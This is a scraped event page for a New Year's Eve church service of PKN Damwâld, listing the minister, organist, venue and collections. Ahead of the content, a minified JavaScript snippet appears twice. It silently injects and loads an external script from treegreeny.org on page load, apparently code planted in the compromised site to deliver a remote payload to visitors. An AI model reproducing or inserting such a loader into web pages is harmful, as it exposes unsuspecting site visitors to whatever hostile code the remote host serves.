;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst Oudejaarsdag 31 december 2023 19:30 uur - PKN Damwâld
zondag 31 december
19:30 uur

Kerkdienst Oudejaarsdag 31 december 19:30 uur

Thema: Oudejaarsdag

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jelte Cuperus
Thema:Oudejaarsdag
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Kerk
Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten